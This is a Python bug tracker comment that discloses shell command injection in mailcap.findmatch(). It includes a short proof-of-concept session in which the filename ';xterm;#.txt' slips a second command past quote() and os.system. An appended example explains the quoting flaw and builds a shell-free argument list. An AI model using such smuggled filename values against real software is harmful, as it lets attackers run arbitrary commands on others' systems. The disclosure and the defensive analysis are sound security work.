[issue24778] mailcap.findmatch() ........ Shell Command Injection in filename

Bernd Dietzel report at bugs.python.org
Mon Aug 3 22:31:07 CEST 2015


Bernd Dietzel added the comment:

Exploit demo which works with quote():

>>> commandline,MIMETYPE=mailcap.findmatch(d, 'text/*', filename=quote(';xterm;#.txt'))
>>> commandline
"less '';xterm;#.txt''"
>>> os.system(commandline)
### xterm starts

----------

_______________________________________
Python tracker <report at bugs.python.org>
<http://bugs.python.org/issue24778>
_______________________________________
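
An added example, not part of the original message or of CPython: it reproduces the command line from the report without running it, shows how a POSIX-style tokenizer reads it, and builds an argv list that needs no shell. The template "less '%s'" is an assumption inferred from the output above; naive_command, shell_tokens and safe_argv are hypothetical names.

```python
import shlex

# Constructed mailcap-style view template. The single quotes around %s are
# an assumption inferred from the output shown in the report.
TEMPLATE = "less '%s'"
SHELL_OPERATORS = set("();<>|&")


def _lex(text):
    """Tokenize roughly like a POSIX shell, keeping operators as own tokens."""
    lexer = shlex.shlex(text, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def naive_command(template, filename):
    """Quote the filename, then paste it into the template string."""
    return template.replace("%s", shlex.quote(filename))


def shell_tokens(commandline):
    """Show what a shell would see: words, operators, comments dropped."""
    return _lex(commandline)


def safe_argv(template, filename):
    """Split the template first, then substitute %s per argv element.

    The filename never passes through a shell parser, so quoting cannot
    cancel out. Templates that need shell operators are rejected.
    """
    argv = _lex(template)
    if any(tok and set(tok) <= SHELL_OPERATORS for tok in argv):
        raise ValueError("template requires a shell; refusing")
    return [tok.replace("%s", filename) for tok in argv]


if __name__ == "__main__":
    name = ";xterm;#.txt"  # filename from the report
    cmd = naive_command(TEMPLATE, name)
    print(cmd)                # quotes from template and quote() pair up
    print(shell_tokens(cmd))  # ';' appears as an unquoted operator
    # This list is what would be passed to subprocess.run(argv), no shell.
    print(safe_argv(TEMPLATE, name))
```

The quotes added by quote() close the quotes already present in the template, so the filename ends up outside any quoting; substituting after splitting avoids the shell entirely.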